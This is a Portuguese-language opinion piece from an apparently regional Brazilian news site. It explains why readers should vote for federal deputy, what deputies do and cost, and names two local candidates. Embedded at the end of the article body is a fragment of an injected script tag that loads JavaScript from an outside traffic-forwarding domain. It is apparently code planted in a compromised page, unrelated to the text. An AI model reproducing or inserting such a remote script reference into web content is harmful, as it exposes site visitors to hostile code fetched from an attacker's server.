InícioVariedadesPor que devo votar para deputado federal?

Por que devo votar para deputado federal?

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Todos nós já estamos mais que cansados de ver as peripécias de nossos congressistas, pelo menos 178 deles respondem a algum processo. PT, PP e PSDB são as siglas com mais deputados com pendências criminais.

 

Tudo isso acaba por nos deixar nauseados com os políticos lá em Brasília, e nos tira a vontade de votar em alguém para ocupar esse cargo.

 

Essa vontade de não votar é até compreensível, mas será que ela é eficiente como uma forma de melhorar a política brasileira? A resposta é não, pois essas 513 cadeiras do congresso federal serão preenchidas, você querendo ou não. E quando não participa do proceso de escolha, acaba deixando que outros escolham aqueles que não queremos ver lá. Basta olhar as pesquisas de intenções de votos, vários deputados que ja foram inclusive condenados estão bem conceituados no desejo do eleitorado. Só isso é motivo mais que suficiente para você votar para deputado federal nas próximas eleições.

 

Mas então, como faço pra escolher meu candidato?

 

É simples, talvez um pouco trabalhoso, mas o resultado pode significar um futuro melhor para o Brasil.

 

Antes de explicar como escolher um candidato, devemos primeiro entender qual é a funçaõ de um deputado federal.

 

A principal função do deputado federal é legislar. Cabe a ele propor, discutir e aprovar leis, que podem alterar até mesmo a Constituição. É responsabilidade dele também, aprovar ou não as medidas provisórias, propostas pelo presidente.

 

Outra importante atribuição do deputado federal é fiscalizar e controlar as ações do Poder Executivo. Quando existem denúncias ou suspeitas de irregularidade, os deputados podem criar uma Comissão Parlamentar de Inquérito (CPI), para investigar um tema ou situação específica. São eles também os únicos com poderes para autorizar a instauração de processo de impeachment contra o presidente da República.

 

Entendendo essas tarefas de um deputado federal é possível determinar um método para escolha de um candidato. Como são eles que irão propor e votar as leis que vão reger nossa sociedade, devemos conhecer bem os princípios deles. Por exemplo, se você é a favor do porte de armas, vote em alguém que é a favor do porte de armas, se você é contra, vote am alguém que seja contra, simples assim. Faça isso com todos os seus princípios e valores, veja dentre os candidatos aquele que mais converge com você e vote nele.

 

Particularmente, acho muito importante ainda, a questão do custo de um parlamentar. Para se ter uma ideia, segundo um estudo da ONG Contas Abertas, cada deputado custa mais de 2 milhões de reais por mês. Isso graças ao pomposo salário de 33,7 mil reais; mais a cota parlamentar, composta por passagens aéreas, serviços postais, manutenção de escritórios de apoio à atividade parlamentar, hospedagem, combustível, contratação de serviços de segurança e consultoria, entre outros; mais a verba destinada à contratação de pessoal, é um valor de R$ 97 mil mensais, destinados à contratação de até 25 secretários parlamentares; e por fim as Despesas com saúde, o deputado federal tem direito ao ressarcimento integral de todas as despesas hospitalares relativas a internação em qualquer hospital do país.

 

Diante de todas essas despesas dos congressistas, escolha aqueles que se comprometerem a economizar o máximo possível, para assim reduzir o custo parlamentar.

 

Outro ponto importante, votar ou não em alguém da região?

 

Bem, essa questão é relevante, pois deputados tendem a levar mais recursos para as suas bases eleitorais, ou regiões onde foram dem votados e eleitos.

 

O Planalto Norte catarinense terá pelo menos dois candidatos, ou melhor, duas candidatas ao congresso federal, Norma Pereira, uma social-democrata de centro-esquerda pelo PSDB e Adriana Dornelles, liberal-conservadora de direita pelo NOVO.

 

Pensem, reflitam e façam a melhor escolha pelo planalto norte e pelo Brasil!… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.